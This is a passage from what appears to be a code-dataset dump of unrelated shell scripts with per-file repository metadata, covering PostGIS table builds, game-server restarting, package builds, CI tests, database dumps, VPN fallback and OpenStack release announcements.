gid_0, name_0,
gid_1, name_1, engtype_1,
gid_2, name_2, engtype_2;
"
# 3rd administrative level
psql -U ${user} -d ${db} -c "
DROP TABLE IF EXISTS gadm_3;
CREATE TABLE gadm_3 AS
SELECT
gid_0, name_0,
gid_1, name_1, engtype_1,
gid_2, name_2, engtype_2,
gid_3, name_3, engtype_3,
ST_Union(wkb_geometry) AS geom
FROM gadm
GROUP BY
gid_0, name_0,
gid_1, name_1, engtype_1,
gid_2, name_2, engtype_2,
gid_3, name_3, engtype_3;
"
# 4th administrative level
psql -U ${user} -d ${db} -c "
DROP TABLE IF EXISTS gadm_4;
CREATE TABLE gadm_4 AS
SELECT
gid_0, name_0,
gid_1, name_1, engtype_1,
gid_2, name_2, engtype_2,
gid_3, name_3, engtype_3,
gid_4, name_4, engtype_4,
ST_Union(wkb_geometry) AS geom
FROM gadm
GROUP BY
gid_0, name_0,
gid_1, name_1, engtype_1,
gid_2, name_2, engtype_2,
gid_3, name_3, engtype_3,
gid_4, name_4, engtype_4;
"
# 5th administrative level
psql -U ${user} -d ${db} -c "
DROP TABLE IF EXISTS gadm_5;
CREATE TABLE gadm_5 AS
SELECT
gid_0, name_0,
gid_1, name_1, engtype_1,
gid_2, name_2, engtype_2,
gid_3, name_3, engtype_3,
gid_4, name_4, engtype_4,
gid_5, name_5, engtype_5,
ST_Union(wkb_geometry) AS geom
FROM gadm
GROUP BY
gid_0, name_0,
gid_1, name_1, engtype_1,
gid_2, name_2, engtype_2,
gid_3, name_3, engtype_3,
gid_4, name_4, engtype_4,
gid_5, name_5, engtype_5;
"
# Don't create spatial index
# Don't check geometry validity | true |
9fef1eac2b3bdfe5cf4e0e1bd5329274aeb64809 | Shell | heihachi/Coding-Projects | /bash/restarter-bin | UTF-8 | 3,065 | 3.203125 | 3 | [] | no_license | #!/bin/bash
######################
GDB_ENABLED=1
GDB="trinity.gdb"
WORLDSERVER="/WoW/TW/bin/world.pid" ### Put here the pid you configured on your worldserver.conf file ###
AUTHSERVER="/WoW/TW/bin/auth.pid" ### Put here the pid you configured on your authserver.conf file ###
### If you want to have more realms runing, just uncoment or copy this line ###
#EXTRAWORLDSERVER="/WoW/4.x/bin/world.pid" ### Put here the pid you configured on your worldserver.conf file ###
WORLD_CONFIG="../etc/worldserver.conf"
REALM_CONFIG="../etc/authserver.conf"
### If you want to have more realms runing, just uncoment or copy this line ###
#EXTRAWORLD_CONFIG="/WoW/4.x/etc/worldserver.conf"
WORLD_SCREEN_NAME="world"
REALM_SCREEN_NAME="realm"
### If you want to have more realms runing, just uncoment or copy this line ###
#EXTRAWORLD_SCREEN_NAME="cata"
TRACE_BEGIN_STRING="SIGSEGV"
TRACE_FILE="../logs/trace.log"
ERR_FILE="../logs/error.log"
SYSLOG="../logs/system.log"
SYSLOGEXTRA="../logs/system_extra.log"
SYSERR="../logs/system.err"
SYSERREXTRA="../logs/system_extra.err"
LINKS_FILE="../logs/crash_links.link"
RESTARTLOG="../logs/restarts.log"
######################
function checkStatus() {
if [ -d "/proc/"$1 ]; then
eval "TEST=1"
else
eval "TEST=0"
fi
}
while :
do
PID=$(cat $WORLDSERVER)
checkStatus $PID
if [ $TEST -eq 0 ]; then
DATE=$(date)
echo "Restarting Trinity Core blizz($DATE)"
echo "Restarting Trinity Core blizz($DATE)" >> $RESTARTLOG
if [ $GDB_ENABLED -eq 1 ]; then
grep -B 10 -A 1800 "$TRACE_BEGIN_STRING" "$SYSLOG" >> "$TRACE_FILE"
echo "------------------`date +%Y-%m-%d-%H-%M-%S`------------------" >> "$TRACE_FILE"
cat "$TRACE_FILE" | grep "http" >> "$LINKS_FILE"
cat "$SYSERR" > "$ERR_FILE"
sudo screen -A -m -d -S $WORLD_SCREEN_NAME ./start worldserver $GDB "$WORLD_CONFIG" "$SYSLOG" "$SYSERR" 1
fi
if [ $GDB_ENABLED -eq 0 ]; then
sudo screen -A -m -d -S $WORLD_SCREEN_NAME ./start worldserver null "$WORLD_CONFIG" null null 0
fi
fi
### If you want to have more realms runing, just uncoment or copy those lines ###
# PID=$(cat $EXTRAWORLDSERVER)
# checkStatus $PID
# if [ $TEST -eq 0 ]; then
# DATE=$(date)
# echo "Restarting Second Core blizz($DATE)"
# echo "Restarting Second Core blizz($DATE)" >> $RESTARTLOG
# screen -A -m -d -S $EXTRAWORLD_SCREEN_NAME ./start worldserver null "$EXTRAWORLD_CONFIG" "$SYSLOGEXTRA" "$SYSERREXTRA" 1
# fi
PID=$(cat "$AUTHSERVER")
checkStatus $PID
if [ $TEST -eq 0 ]; then
DATE=$(date)
echo "Restarting Trinity Realm ($DATE)"
sudo screen -A -m -d -S $REALM_SCREEN_NAME ./start authserver null "$REALM_CONFIG"
fi
sleep 45
done
| true |
a6b9a6a158f5077301b5db655e6b2c0150fa5264 | Shell | rid9/r1-linux | /pulseaudio/pkg.sh | UTF-8 | 1,158 | 3.390625 | 3 | [] | no_license | #!/bin/bash
PKG_DIR=$(realpath "${BASH_SOURCE[0]%/*}")
source "$(realpath "$PKG_DIR/..")/functions.sh"
DEPS=(libsndfile speex speexdsp)
OPT_DEPS=(alsa-lib dbus glib libcap speex)
SOURCE_URLS=(
"https://www.freedesktop.org/software/pulseaudio/releases/pulseaudio-11.1.tar.xz"
"http://www.linuxfromscratch.org/patches/blfs/8.2/pulseaudio-11.1-glibc_2.27_fix-1.patch"
)
after_extract() {
cd "${SOURCE_WORK_DIR}" &&
patch -Np1 -i "${SOURCES_DIR}/pulseaudio-11.1-glibc_2.27_fix-1.patch" &&
AUTOPOINT='intltoolize --automake --copy' autoreconf -fiv
}
before_configure() {
CONFIGURE_FLAGS+=(
"--sysconfdir=/etc"
"--localstatedir=/var"
"--disable-bluez4"
"--enable-bluez5"
"--disable-rpath"
)
}
after_install() {
if [ "$(grep '^pulse:' /etc/group | wc -l)" == "0" ]; then
$SUDO groupadd pulse
fi &&
if [ "$(grep '^pulse:' /etc/passwd | wc -l)" == "0" ]; then
$SUDO useradd -d /var/run/pulse -g pulse pulse
fi &&
$SUDO rm -fv /etc/dbus-1/system.d/pulseaudio-system.conf &&
$SUDO sed -i '/load-module module-console-kit/s/^/#/' /etc/pulse/default.pa
}
| true |
1906c793326e3ef8ab89a6660926ac31e6803352 | Shell | IntelAI/tools | /tensorflow_quantization/tests/integration/launch_test.sh | UTF-8 | 3,518 | 3.3125 | 3 | [
"Apache-2.0"
] | permissive | #
# Copyright (c) 2019 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#!/usr/bin/env bash
set -e
set -x
# To find Dockerfile
cd ../../
TF_REPO=$(pwd)
MOUNTED_DIR=${TF_REPO}/mounted_dir
OUTPUT=${MOUNTED_DIR}/output
DATASET=${MOUNTED_DIR}/dataset
INTEL_MODELS=${INTEL_MODELS:-${OUTPUT}/models}
LOGS=${OUTPUT}/test_logs.txt
if [ ! -d ${MOUNTED_DIR} ]; then
mkdir ${MOUNTED_DIR}
fi
if [ ! -d ${DATASET} ]; then
# Copy datasets from an existing shared location on SKX nodes to the mounted directory.
mkdir ${DATASET}
cd ${DATASET}
# when adding new models, please copy the required dataset if it was not already copied from /tf_dataset/dataset/ here.
mkdir imagenet-data && cp ${IMAGENET_TF_DATASET}/* ${DATASET}/imagenet-data
mkdir coco-data && cp ${COCO_TF_DATASET}/* ${DATASET}/coco-data
mkdir coco-data-ssdvgg16 && cp ${COCO_TF_SSDVGG16}/* ${DATASET}/coco-data-ssdvgg16
fi
# OUTPUT directory exists when test fails,
# so we need to clean up and re-create new one for next test run.
# NOTE:
# The supported models training datasets are required, and expected to be copied/exist in the MOUNTED_DIR directory.
# This is for generating the quantized graph min_max ranges (in the data calibration step).
if [ -d ${OUTPUT} ]
then
rm -rf ${OUTPUT}
fi
mkdir ${OUTPUT}
if [ $? -eq 1 ]
then
echo "Output directory creation for test scripts FAILED" | tee ${LOGS}
exit 1
else
echo "Created output directory for running test scripts at: ${OUTPUT}" | tee ${LOGS}
fi
if [ ! -d ${INTEL_MODELS} ]; then
cd ${OUTPUT}
git clone https://github.com/IntelAI/models.git
else
cp -r ${INTEL_MODELS} ${OUTPUT}
fi
cd ${TF_REPO}
# Build and run the docker image
QUANTIZATION_TAG="quantization:latest"
echo "Building quantization tools docker image with tag: ${QUANTIZATION_TAG}" | tee -a ${LOGS}
docker build -f Dockerfile \
-t ${QUANTIZATION_TAG} \
--build-arg HTTP_PROXY=${HTTP_PROXY} \
--build-arg HTTPS_PROXY=${HTTPS_PROXY} \
--build-arg http_proxy=${http_proxy} \
--build-arg https_proxy=${https_proxy} . | tee -a ${LOGS}
if [ "${PIPESTATUS[0]}" -eq "0" ]
then
echo ""
echo "******** Running Quantization Test Scripts ********" | tee -a ${LOGS}
python launch_quantization.py \
--docker-image ${QUANTIZATION_TAG} \
--pre-trained-model-dir ${MOUNTED_DIR} \
--verbose --test | tee -a ${LOGS}
if [ "${PIPESTATUS[0]}" -ne "0" ] && [ "${PIPESTATUS[0]}" -ne "124" ] || [[ "`grep 'usage: bazel-bin/' ${LOGS} > /dev/null`" != "" ]]
then
echo "Test scripts run FAILED !!" | tee -a ${LOGS}
echo "Please check logs at: ${LOGS}" | tee -a ${LOGS}
exit 1
else
echo "Test scripts run completed SUCCESSFULLY !!" | tee -a ${LOGS}
fi
else
echo "Error: Quantization tools docker build FAILED " | tee -a ${LOGS}
echo "Test scripts haven't INITIATED, please fix issue and re-run" | tee -a ${LOGS}
echo "Please check logs at: ${LOGS}" | tee -a ${LOGS}
exit 1
fi
| true |
17aaaf108b88fca16363f515a5d7922a060a4bbb | Shell | ljm516/python-repo | /big-challenge/mysqldb_dump/dump_db.sh | UTF-8 | 1,250 | 3.71875 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
if [ $# = 0 ]
then
echo "No environment selected. e.g, staging/dev/dev2/dev3"
exit 1
fi
ENV=$1
SOURCE_HOST=127.0.0.1
SOURCE_USER=root
SOURCE_PASSWD=PASSWORD
TARGET_HOST=127.0.0.1
TARGET_USER=root
TARGET_PASSWD=PASSWORD
declare -a databases=(yolar)
for db in "${databases[@]}"
do
DUMP_FILE=${db}_localhost_dump.sql
SOURCE_DB=${db}_localhost
TARGET_DB=${db}_${ENV}
# Dump data
printf "> Dumping $db to $DUMP_FILE ... "
# mysqldump --host=$SOURCE_HOST --user=$SOURCE_USER --password=$SOURCE_PASSWD --single-transaction --set-gtid-purged=OFF $SOURCE_DB > $DUMP_FILE
mysqldump --opt -u $SOURCE_USER -p $SOURCE_DB > $DUMP_FILE
printf "Finished\n"
#Restore from dumps
printf "> Restore $db from $DUMP_FILE ... "
# mysql --host=$TARGET_HOST --user=$TARGET_USER --password=$TARGET_PASSWD $TARGET_DB < $DUMP_FILE
mysql -u $TARGET_USER -p $TARGET_DB < $DUMP_FILE
printf "Finished\n"
done
if [ $ENV = dev ]
then
ENV=Develop
fi
if [ $ENV = dev2 ]
then
ENV=Develop2
fi
if [ $ENV = dev3 ]
then
ENV=Develop3
fi
if [ $ENV = dev4 ]
then
ENV=Develop4
fi
if [ $ENV = dev5 ]
then
ENV=Develop5
fi
python3 -m test.py $ENV | true |
ed1daf6cbb6397f8f407cf4a9613dc604c98efc7 | Shell | vimsen/VGW | /fallback.sh | UTF-8 | 3,341 | 3.328125 | 3 | [] | no_license | #!/bin/bash
logfile="results.txt"
eth0=1
ppp0=0
#connect 3g
sudo bash /usr/bin/modem3g/sakis3g connect
#add route...
route add default gw 192.168.1.1 #to router pou to syndeoume
# connect VPN
echo "Connecting to VPN" && echo "Connecting to VPN" >> $logfile
sudo /home/pi/startVPN.sh #> /dev/null
sleep 15
ping -c 1 -I eth0 8.8.8.8 > /dev/null && status1=1 || status1=0
#echo status1, $status1
ping -c 1 -I ppp0 8.8.8.8 > /dev/null && status2=1 || status2=0
#echo status2, $status2
fallback=0
while true;do
ping -c 1 -I eth0 8.8.8.8 > /dev/null
check_one=$?
ping -c 1 -I ppp0 8.8.8.8 > /dev/null
check_two=$?
# ip=$(ifconfig | grep -oP "(?<=inet addr:).*?(?=Bcast)")
# ip = $(ifconfig eth0 | grep 'inet addr:'| cut -d: -f2 | awk '{ print $1}')
# echo $ip
# if [[ $ip != " " ]]
# then
# echo "eth0 = " $ip
# else
# echo "eth0 IP = DOES NOT EXIST"
# fi
if [[ $check_one -eq 0 ]] #if eth0 is up
then
eth0=1
echo "eth0 is up and routing exists" && echo "eth0 is up and routing exists" >> $logfile
if [ $fallback -eq 1 ]
then
vtysh -c "show run" –c "conf t" –c " no ip route 0.0.0.0/0 10.64.64.64 " –c "ip route 0.0.0.0/0 94.70.239.209" –c "end" –c "show run" > /dev/null
#kill VPN
echo "Killing VPN" && echo "Killing VPN" >> $logfile
service openvpn stop >/dev/null 2>&1
kill $(pidof openvpn)
killall openvpn # just to be REALLY CERTAIN
echo "routing via eth0" && echo "routing via eth0" >> $logfile
fallback=0
sleep 5
#Restart VPN
echo "Restart VPN" && echo "Restart VPN" >> $logfile
sudo /home/pi/startVPN.sh #> /dev/null
sleep 30
fi
else #if eth0 is down
eth0=0
echo "eth0 is down" && echo "eth0 is down" >> $logfile
fi
if [[ $check_two -eq 0 ]] #if ppp0 is up
then
ppp0=1
echo "ppp0 is up and routing exists" && echo "ppp0 is up and routing exists" >> $logfile
else #if ppp0 is down
ppp0=0
echo "ppp0 is down." && echo "ppp0 is down." >> $logfile
fi
# GLL
if [[ $eth0 -eq 1 ]] && [[ $ppp0 -eq 1 ]] #if eth0 is up AND ppp0 is up
then
echo "eth0 is UP and ppp0 is UP"
fi
# GLL
if [[ $eth0 -eq 1 ]] && [[ $ppp0 -eq 0 ]] #if eth0 is up AND ppp0 is down
then
echo "eth0 is UP and ppp0 is DOWN"
fi
# GLL
if [[ $eth0 -eq 0 ]] && [[ $ppp0 -eq 0 ]] #if eth0 is DOWN AND ppp0 is DOWN
then
echo "eth0 is DOWN and ppp0 is DOWN -> REBOOOOOOT"
fi
if [[ $eth0 -eq 0 ]] && [[ $ppp0 -eq 1 ]] #if eth0 is down AND ppp0 is up
then
if [ $fallback -eq 0 ]
then
echo "eth0 is down and routing via ppp0" && echo "eth0 is down and routing via ppp0" >> $logfile
vtysh -c "show run" –c "conf t" –c "no ip route 0.0.0.0/0 94.70.239.209" –c "ip route 0.0.0/0 10.64.64.64" –c "end" –c "show run" > /dev/null
fallback=1
#kill VPN
echo "Killing VPN" && echo "Killing VPN" >> $logfile
service openvpn stop >/dev/null 2>&1
kill $(pidof openvpn)
killall openvpn # just to be REALLY CERTAIN
sleep 2
#Restart VPN
echo "Restart VPN" && echo "Restart VPN" >> $logfile
sudo /home/pi/startVPN.sh #> /dev/null
sleep 30
else
echo "not doing anything" && echo "not doing anything" >> $logfile
echo $eth0
echo $ppp0
fi
fi
status1=eth0
status2=ppp0
sleep 10
done
| true |
1e53f4ce6ae94cebb3a2aa5b77f3a394bf147d61 | Shell | OpenCPN/plugins | /cloudsmith-sync.sh | UTF-8 | 714 | 3.515625 | 4 | [] | no_license | #!/bin/bash
set -euo pipefail
# Determine the correct version, this is derived
# from the latest commit to the 'ci' branch in the code
# project, which is next door (../radar-pi)
if [ $# != 4 ]
then
echo "Usage: $0 <project> <cloudsmith-user> <cloudsmith-repo> <tag/commit>"
echo ""
exit 2
fi
PROJECT="${1}"
CLOUDSMITH_USER="${2}"
CLOUDSMITH_REPO="${3}"
QUERY="${4}"
cd metadata
for url in $(
curl -s -S "https://api.cloudsmith.io/packages/${CLOUDSMITH_USER}/${CLOUDSMITH_REPO}/?page_size=9999&query=${QUERY}" |
jq -r '.[] |
select(.extension == ".xml") |
.cdn_url'
)
do
echo $url
# -r to clobber existing file
file=$(basename "${url}")
curl -s -S -o "${file}" "${url}"
done
| true |
28ac0816c686bc9de38b012aca8a844dc5e5d090 | Shell | skhatri/dse-cassandra-wrapped | /run.sh | UTF-8 | 1,013 | 2.734375 | 3 | [] | no_license | #!/usr/bin/env bash
. ./clean.sh
if [[ -d $(pwd)/volumes ]]; then rm -rf $(pwd)/volumes; fi;
mkdir -p $(pwd)/volumes/{lib-cassandra,lib-dsefs,lib-spark,log-cassandra,log-spark,conf-cassandra,conf-dse,conf-spark,bin-dse,collectd-dse,config,tmp,.cassandra}
#-e DSE_AUTO_CONF_OFF=all
docker run \
--read-only \
--name dse \
-v $(pwd)/volumes/conf-cassandra:/opt/dse/resources/cassandra/conf \
-v $(pwd)/volumes/conf-spark:/opt/dse/resources/spark/conf \
-v $(pwd)/volumes/conf-dse:/opt/dse/resources/dse/conf \
-v $(pwd)/volumes/collectd-dse:/opt/dse/resources/dse/collectd \
-v $(pwd)/volumes/bin-dse:/opt/dse/bin \
-v $(pwd)/volumes/lib-cassandra:/var/lib/cassandra \
-v $(pwd)/volumes/lib-dsefs:/var/lib/dsefs \
-v $(pwd)/volumes/lib-spark:/var/lib/spark \
-v $(pwd)/volumes/log-cassandra:/var/log/cassandra \
-v $(pwd)/volumes/log-spark:/var/log/spark \
-v $(pwd)/volumes/config:/config \
-v $(pwd)/volumes/tmp:/tmp \
-v $(pwd)/volumes/.cassandra:/opt/dse/.cassandra \
-p 9042:9042 \
-dt dse-server:latest
| true |
ad1cbb8a55491a4b8dd7d8c4a7a381e87781607a | Shell | cmlesquivel/holberton-system_engineering-devops | /0x04-loops_conditions_and_parsing/9-to_file_or_not_to_file | UTF-8 | 739 | 3.578125 | 4 | [] | no_license | #!/usr/bin/env bash
# Bash script that gives you information about the holbertonschool file
file="holbertonschool"
if [ -e "$file" ]
then
echo "holbertonschool file exists"
if [ -s "$file" ]
then
echo "holbertonschool file is not empty"
else
echo "holbertonschool file is empty"
fi
if [ -f "$file" ]
then
echo "holbertonschool is a regular file"
fi
# else
# echo "holbertonschool file is empty"
else
echo "holbertonschool file does not exist"
# elif(("$counter"==8))
# then
# echo "good luck"
# else
# echo "Holberton School"
# fi
# (( counter++ ))
fi
# if ((-e "holbertonschool"))
# then
# echo "holbertonschool file exists"
# elif(("$counter"==8))
# then
# echo "good luck"
# else
# echo "Holberton School"
# fi
# (( counter++ )) | true |
ab5ee0c91030dfeea0f0507a5d5a064009e98114 | Shell | pdp7/fomu-workshop | /.github/tests.sh | UTF-8 | 1,707 | 2.96875 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
set -e
TOOLCHAIN_PATH="$PWD/$(find fomu-toolchain-* -type d -maxdepth 0 2>/dev/null)"
echo "TOOLCHAIN_PATH: $TOOLCHAIN_PATH"
export PATH=$TOOLCHAIN_PATH/bin:$PATH
# Test the RISC-V C example
travis_fold start riscv-c
echo "RISC-V C Example"
travis_time_start
(
set -x
cd riscv-blink
make
file riscv-blink.dfu
)
travis_time_finish
travis_fold end riscv-c
# Test the Verilog Blink example
travis_fold start verilog-blink
echo "Verilog Blink example"
travis_time_start
(
set -x
cd verilog/blink
make FOMU_REV=pvt
file blink.dfu
)
travis_time_finish
travis_fold end verilog-blink
# Test the Verilog Blink (expanded) example for Hacker
travis_fold start verilog-blink-expanded-hacker
echo "Verilog Blink (expanded) example for Hacker board"
travis_time_start
(
set -x
cd verilog/blink-expanded
make FOMU_REV=hacker
file blink.dfu
)
travis_time_finish
travis_fold end verilog-blink-expanded-hacker
# Test the Verilog Blink (expanded) example for PVT
travis_fold start verilog-blink-expanded-pvt
echo "Verilog Blink (expanded) example for PVT board"
travis_time_start
(
set -x
cd verilog/blink-expanded
make FOMU_REV=pvt
file blink.dfu
)
travis_time_finish
travis_fold end verilog-blink-expanded-pvt
# Test the LiteX example for Hacker
travis_fold start litex-hacker
echo "LiteX example for Hacker"
travis_time_start
(
set -x
cd litex
./workshop.py --board=hacker
file build/gateware/top.dfu
)
travis_time_finish
travis_fold end litex-hacker
# Test the LiteX example for PVT
travis_fold start litex-pvt
echo "LiteX example for PVT"
travis_time_start
(
set -x
cd litex
./workshop.py --board=pvt
file build/gateware/top.dfu
)
travis_time_finish
travis_fold end litex-pvt
| true |
d46cd7994a81e8414f5167e159da017361820ad2 | Shell | openstack/releases | /tools/announce.sh | UTF-8 | 6,631 | 3.46875 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
#
# Script to generate a release announcement for a project.
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
set -e
if [ $# -lt 1 ]; then
echo "Usage: $0 path-to-repository [version]"
echo
echo "Example: $0 ~/repos/openstack/oslo.rootwrap"
echo "Example: $0 ~/repos/openstack/oslo.rootwrap 3.0.3"
exit 2
fi
set -x
TOOLSDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
source $TOOLSDIR/functions
RELEASESDIR=$(realpath $TOOLSDIR/..)
REPODIR=$(cd $1 && pwd)
VERSION=$2
# If the version looks like an alpha or beta, ignore it. The script
# for producing release notes has templates for regular releases and
# release candidates.
if [[ $VERSION =~ (a|b) ]]; then
echo "No announcements are generated for alpha or beta releases."
exit 0
fi
# The repository directory may be named something other than what the
# repository is, if we're running under CI or someone has checked it
# out locally to an alternate name. Use the git remote URL as a source
# of better information for the real repository name.
REMOTE_URL=$(cd $REPODIR && git config --get remote.origin.url || echo "")
if [ ! -z "$REMOTE_URL" ] && [ "$REMOTE_URL" != "file:///dev/null" ]; then
# Make sure .git extensions are not included
SHORTNAME=$(basename $REMOTE_URL .git)
else
# WARNING(dhellmann): This formulation only works in CI where the
# workspace structure matches the git repo names upstream.
SHORTNAME=$(basename $REPODIR)
fi
# Assign a default "from" email address if one is not specified by the
# user's environment.
export EMAIL=${EMAIL:-no-reply@openstack.org}
if [[ -z "$VIRTUAL_ENV" ]]; then
if ! (cd $RELEASESDIR && tox -e venv --notest); then
echo "Failed to build virtualenv"
exit 1
fi
source $RELEASESDIR/.tox/venv/bin/activate
fi
# Make our output directory before we start moving around into
# temporary directories.
RELNOTESDIR="$PWD/relnotes"
mkdir -p $RELNOTESDIR
# Set up temporary directory for scratch files
setup_temp_space announce-$SHORTNAME
cd $REPODIR
# Determine the most recent tag if we weren't given a value.
if [[ -z "$VERSION" ]]; then
VERSION=$(get_last_tag)
fi
# Look for the previous version on the same branch. If the command
# fails because there are no other tags, we will produce the entire
# history.
PREVIOUS_VERSION=$(git describe --abbrev=0 ${VERSION}^ 2>/dev/null || echo "")
if [[ "$PREVIOUS_VERSION" = "" ]]; then
# There was no previous tag, so we're looking for the full history
# of the project.
PREVIOUS_VERSION=$(git rev-list --max-parents=0 HEAD | tail -1)
first_release="--first-release"
fi
# Extract the tag message by parsing the git show output, which looks
# something like:
#
# tag 2.0.0
# Tagger: Doug Hellmann <doug@doughellmann.com>
# Date: Tue Dec 1 21:45:44 2015 +0000
#
# python-keystoneclient 2.0.0 release
#
# meta:version: 2.0.0
# meta:series: mitaka
# meta:release-type: release
# -----BEGIN PGP SIGNATURE-----
# Comment: GPGTools - http://gpgtools.org
#
# iQEcBAABAgAGBQJWXhUIAAoJEDttBqDEKEN62rMH/ihLAGfw5GxPLmdEpt7gsLJu
# ...
#
TAG_META=$(git show --no-patch "$VERSION" | grep '^meta:' || true)
if [[ -z "$TAG_META" ]]; then
echo "WARNING: Missing meta lines in $VERSION tag message,"
echo " skipping announcement."
echo
echo "Was the tag for $VERSION created with release.sh?"
exit 0
fi
function get_tag_meta {
typeset fieldname="$1"
echo "$TAG_META" | grep "^meta:$fieldname:" | sed "s/meta:$fieldname: *//"
}
# How far back should we look for release info? If there is no
# explicit metadata (signaled by passing "-"), use whatever previous
# version number we were able to detect.
DIFF_START=$(get_tag_meta diff-start)
if [[ "$DIFF_START" == "-" ]]; then
DIFF_START="$PREVIOUS_VERSION"
fi
# The series name is part of the commit message left by release.sh.
SERIES=$(get_tag_meta series)
# The type of release this is.
RELEASETYPE=$(get_tag_meta release-type)
# Figure out if that series is a stable branch or not. We don't
# release pre-releases on stable branches, so we only need to check
# for stable if the release type is a normal release.
if [[ $RELEASETYPE = "release" ]]; then
if git branch -a | grep -q origin/stable/$SERIES; then
stable="--stable"
fi
fi
# If this is the first full release in a series, it isn't "stable"
# yet.
FIRST_FULL=$(get_tag_meta first)
if [[ $FIRST_FULL = "yes" ]]; then
stable=""
fi
# Only include the PyPI link if we are told to.
INCLUDE_PYPI_LINK=$(get_tag_meta pypi)
if [[ "$INCLUDE_PYPI_LINK" == "yes" ]]; then
include_pypi_link="--include-pypi-link"
fi
echo "$DIFF_START to $VERSION on $SERIES"
relnotes_file="$RELNOTESDIR/$SHORTNAME-$VERSION"
# As we use importlib to retrieve information we have to pass the
# importable name of the module, example: oslo.messaging => oslo_messaging
modified_shortname=${SHORTNAME//\./_}
# ensure that the package is a valid package that can be imported by
# importlib.metadata
python -m pip install .
project_name=$(python -c "import importlib.metadata; print(importlib.metadata.metadata('${modified_shortname}')['Name'])" || true)
if [ -n "${project_name}" ] ; then
description=$(python -c "import importlib.metadata; print(importlib.metadata.metadata('${modified_shortname}')['Summary'])")
else
# As a last resort, guess that the project name may be the same as that
# of the local working directory at the point this script is invoked.
project_name="$(basename $(pwd))"
fi
# If we are running in the context of a Zuul CI system,
# we can just infer the project name from the repo name it supplies.
if [ -n "$ZUUL_PROJECT" ] ; then
project_name="$(basename ${ZUUL_PROJECT})"
fi
echo
echo "Generating email body in $relnotes_file"
release-notes \
--email \
--series "$SERIES" \
$stable \
$first_release \
--publishing-dir-name "$SHORTNAME" \
. "$project_name" "$DIFF_START" "$VERSION" \
$include_pypi_link \
--description "$description" \
| tee $relnotes_file
echo
echo "Sending release announcement"
send-mail -v $relnotes_file
| true |
fc1dc77b775e3851b9328824fe83e6b9125cb02f | Shell | vifino/.files | /.mutt/acc-cgen | UTF-8 | 395 | 3.671875 | 4 | [] | no_license | #!/bin/sh
# Generate an account list and bindings and what not.
# Vars
ACC_SWITCH=~/.mutt/acc-switch
echo "# Macros for switching."
i=1
for f in ~/.mutt/accs.d/*.muttrc ; do
AN=$(basename "$f" | rev | cut -d. -f2- | rev)
cat <<MCRO
macro index A$i "<enter-command>source 'exec $ACC_SWITCH $AN|'<enter>" "show account $AN"
MCRO
i=$((i+1))
done
echo
# Invoke for default.
exec $ACC_SWITCH
| true |
6a4d6afc6336d2789118193c829b7d691eccae41 | Shell | Dc-cpu-arch/holberton-system_engineering-devops | /0x0C-web_server/0-transfer_file | UTF-8 | 246 | 3.421875 | 3 | [] | no_license | #!/usr/bin/env bash
# script that transfers a file from our flient to a server.
if [[ $# -ne 4 ]]
then
echo "Usage: 0-trnasfer_file PATH_TO_FILE IP USERNAME PATH_TO_SSH_KEY"
else
scp -o StrictHostKeyChecking=no -i "$4" "$1" "$3@$2":~/
fi
| true |
8ff613e78d2e0c90b94e0b3535012488191de3b7 | Shell | TaylanUB/misc | /bin/rpm2cpio | UTF-8 | 695 | 3.046875 | 3 | [] | no_license | #!/bin/sh
if [ $# -ne 1 ]
then
echo >&2 'Usage: rpm2cpio <filename>'
exit
fi
if [ -t 1 ]
then
echo >&2 'shamelessly refusing to write to terminal'
exit
fi
pkg=$1
leadsize=96
o=$(( $leadsize + 8 ))
set -- $(od -j $o -N 8 -t u1 "$pkg")
il=$(( 256 * ( 256 * ( 256 * $2 + $3 ) + $4 ) + $5 ))
dl=$(( 256 * ( 256 * ( 256 * $6 + $7 ) + $8 ) + $9 ))
sigsize=$(( 8 + 16 * $il + $dl))
o=$(( $o + $sigsize + ( 8 - ( $sigsize % 8 ) ) % 8 + 8))
set -- $(od -j $o -N 8 -t u1 "$pkg")
il=$(( 256 * ( 256 * ( 256 * $2 + $3 ) + $4 ) + $5))
dl=$(( 256 * ( 256 * ( 256 * $6 + $7 ) + $8 ) + $9))
hdrsize=$(( 8 + 16 * $il + $dl ))
o=$(( $o + $hdrsize ))
dd if="$pkg" ibs=$o skip=1 2>/dev/null
| true |
2e2c438763daeef754864b7fc6d3ba605a725afb | Shell | rhnkrnwt/armory | /docker/build.sh | UTF-8 | 1,814 | 4.15625 | 4 | [
"MIT"
] | permissive | #!/usr/bin/env bash
# Build a docker image for specific framework. Optionally `all` frameworks can be built.
# Ex: `bash docker/build.sh pytorch`
if [ "$#" -ne 1 ]; then
echo "Please pass a single argument to specify which framework to build. Must be either \`tf1\`, \`tf2\` or \`pytorch\` or \`all\`"
exit 1
fi
# Parse framework argument
if [[ "$1" != "pytorch" && "$1" != "tf1" && "$1" != "tf2" && "$1" != "all" ]]; then
echo "Framework argument must be either \`tf1\`, \`tf2\` or \`pytorch\` or \`all\`"
exit 1
fi
# Parse Version
version=$(python -m armory --version)
if [[ $version == *"-dev" ]]; then
echo "Armory version $version is a '-dev' branch. To build docker images, use:"
echo "bash docker/build-dev.sh"
exit
fi
# Build images
if [[ "$1" == "all" ]]; then
echo "Building docker images for all frameworks..."
for framework in "tf1" "tf2" "pytorch"; do
docker build --force-rm --file docker/Dockerfile --target armory -t twosixarmory/armory:${version} .
docker build --force-rm --file docker/${framework}/Dockerfile --build-arg armory_version=${version} --target armory-${framework}-base -t twosixarmory/${framework}-base:${version} .
docker build --force-rm --file docker/${framework}-dev/Dockerfile --build-arg armory_version=${version} --target armory-${framework}-dev -t twosixarmory/${framework}:${version} .
done
else
